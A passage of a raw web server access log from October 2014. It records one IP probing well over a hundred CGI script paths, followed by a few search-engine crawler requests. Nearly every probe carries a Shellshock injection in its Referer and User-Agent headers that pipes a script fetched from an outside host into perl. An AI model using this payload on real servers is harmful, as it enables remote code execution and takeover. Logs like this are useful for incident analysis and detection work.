http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:21 +0200] "GET /cgi-bin/gm-authors.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:21 +0200] "GET /cgi-bin/gH.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:21 +0200] "GET /cgi-bin/getdoc.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:21 +0200] "GET /cgi-bin/generate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:22 +0200] "GET /cgi-bin/gbook/gbook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:22 +0200] "GET /cgi-bin/gbadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:22 +0200] "GET /cgi-bin/FormMail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:22 +0200] "GET /cgi-bin/FormHandler.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:24 +0200] "GET /cgi-bin/fom.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:24 +0200] "GET /cgi-bin/flexform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:24 +0200] "GET /cgi-bin/finger.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:24 +0200] "GET /cgi-bin/FileSeek2.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:25 +0200] "GET /cgi-bin/FileSeek.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:25 +0200] "GET /cgi-bin/faqmanager.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:25 +0200] "GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:26 +0200] "GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:26 +0200] "GET /cgi-bin/ezshopper/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:26 +0200] "GET /cgi-bin/ezshopper/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:26 +0200] "GET /cgi-bin/ezman.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:26 +0200] "GET /cgi-bin/ezboard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:26 +0200] "GET /cgi-bin/ezadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:26 +0200] "GET /cgi-bin/environ.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:30 +0200] "GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:30 +0200] "GET /cgi-bin/download.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:30 +0200] "GET /cgi-bin/directorypro.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:30 +0200] "GET /cgi-bin/dig.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:31 +0200] "GET /cgi-bin/diagnose.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:31 +0200] "GET /cgi-bin/dfire.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:31 +0200] "GET /cgi-bin/dcforum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:31 +0200] "GET /cgi-bin/dbman/db.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:32 +0200] "GET /cgi-bin/db_manager.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:33 +0200] "GET /cgi-bin/day5datacopier.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:33 +0200] "GET /cgi-bin/cvsqueryform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:35 +0200] "GET /cgi-bin/cvslog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:35 +0200] "GET /cgi-bin/cvsblame.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:35 +0200] "GET /cgi-bin/csv_db.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:35 +0200] "GET /cgi-bin/csSearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:35 +0200] "GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:36 +0200] "GET /cgi-bin/csPassword.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:38 +0200] "GET /cgi-bin/csNews.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:38 +0200] "GET /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:38 +0200] "GET /cgi-bin/CSMailto.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:38 +0200] "GET /cgi-bin/csLiveSupport.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:38 +0200] "GET /cgi-bin/csGuestBook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:38 +0200] "GET /cgi-bin/csChatRBox.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:39 +0200] "GET /cgi-bin/Count.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:42 +0200] "GET /cgi-bin/commerce.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:42 +0200] "GET /cgi-bin/commandit.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:42 +0200] "GET /cgi-bin/classifieds/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:43 +0200] "GET /cgi-bin/classifieds.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:44 +0200] "GET /cgi-bin/classified.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:44 +0200] "GET /cgi-bin/cgi_processHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:44:44 +0200] "GET /cgi-bin/cgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:47 +0200] "GET /cgi-bin/cartmanager.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:48 +0200] "GET /cgi-bin/calendar/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:48 +0200] "GET /cgi-bin/cachemgr.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:48 +0200] "GET /cgi-bin/cached_feed.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:48 +0200] "GET /cgi-bin/c_download.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:49 +0200] "GET /cgi-bin/bulk/bulk.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:50 +0200] "GET /cgi-bin/build.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:50 +0200] "GET /cgi-bin/bslist.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:50 +0200] "GET /cgi-bin/bsguest.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:50 +0200] "GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:51 +0200] "GET /cgi-bin/book.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:51 +0200] "GET /cgi-bin/bnbform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:51 +0200] "GET /cgi-bin/blog/mt-load.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:52 +0200] "GET /cgi-bin/blog/mt-check.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:52 +0200] "GET /cgi-bin/bizdb1-search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:52 +0200] "GET /cgi-bin/bigconf.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:52 +0200] "GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:53 +0200] "GET /cgi-bin/BBS/bbs_forum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:53 +0200] "GET /cgi-bin/bb-replog.shHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:44:54 +0200] "GET /cgi-bin/bb-hostsvc.shHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:44:54 +0200] "GET /cgi-bin/bb-histlog.shHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:44:55 +0200] "GET /cgi-bin/bb-ack.shHTTP/1.0" 503 323 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:44:55 +0200] "GET /cgi-bin/bannereditor.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:55 +0200] "GET /cgi-bin/banner.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:56 +0200] "GET /cgi-bin/badmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:56 +0200] "GET /cgi-bin/axs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:56 +0200] "GET /cgi-bin/ax.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:56 +0200] "GET /cgi-bin/ax-admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:57 +0200] "GET /cgi-bin/auktion.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:57 +0200] "GET /cgi-bin/auction/auction.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:57 +0200] "GET /cgi-bin/AT-generate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:57 +0200] "GET /cgi-bin/AT-admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:58 +0200] "GET /cgi-bin/astrocam.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:58 +0200] "GET /cgi-bin/architext_query.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:58 +0200] "GET /cgi-bin/AnyBoard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:58 +0200] "GET /cgi-bin/alienform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:58 +0200] "GET /cgi-bin/aglimpse.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:44:59 +0200] "GET /cgi-bin/af.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:00 +0200] "GET /cgi-bin/adminhot.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:00 +0200] "GET /cgi-bin/admin/setup.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:01 +0200] "GET /cgi-bin/admin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:02 +0200] "GET /cgi-bin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:04 +0200] "GET /cgi-bin/addbanner.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:05 +0200] "GET /cgi-bin/add_ftp.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:07 +0200] "GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:09 +0200] "GET /cgi-bin/a1disp3.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:10 +0200] "GET /cgi-bin/14all.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:11 +0200] "GET /cgi-bin/14all-1.1.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:12 +0200] "GET /cgi-bin/.namazu.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:14 +0200] "GET /cgi-bin/.cobalt/message/message.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:13 +0200] "GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:15 +0200] "GET /cgi-bin-sdb/printenvHTTP/1.0" 404 226 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:45:17 +0200] "GET /catalog/index.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:17 +0200] "GET /cartcart.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:17 +0200] "GET /cart.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:17 +0200] "GET /bigconf.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:17 +0200] "GET /bandwidth/index.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:18 +0200] "GET /b2-include/b2edit.showposts.phpHTTP/1.0" 404 237 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:45:20 +0200] "GET /analyse.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:20 +0200] "GET /aktivate/cgi-bin/catgy.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:20 +0200] "GET /agora.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:20 +0200] "GET /administrator.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:21 +0200] "GET /admin.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:45:21 +0200] "GET /_mt/mt.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +123.125.71.97 - - [31/Oct/2014:07:10:32 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +66.249.78.119 - - [31/Oct/2014:07:10:35 +0200] "GET /ftp/public/pictures/gallery/IMG_6847.jpg HTTP/1.1" 200 967358 "-" "Googlebot-Image/1.0" +66.249.78.112 - - [31/Oct/2014:07:10:36 +0200] "GET /ftp/public/pictures/gallery/IMG_5737.jpg HTTP/1.1" 200 1087081 "-" "Googlebot-Image/1.0" +66.249.78.119 - - [31/Oct/2014:07:11:39 +0200] "GET /ftp/public/pictures/gallery/IMG_0159.jpg HTTP/1.1" 200 786205 "-" 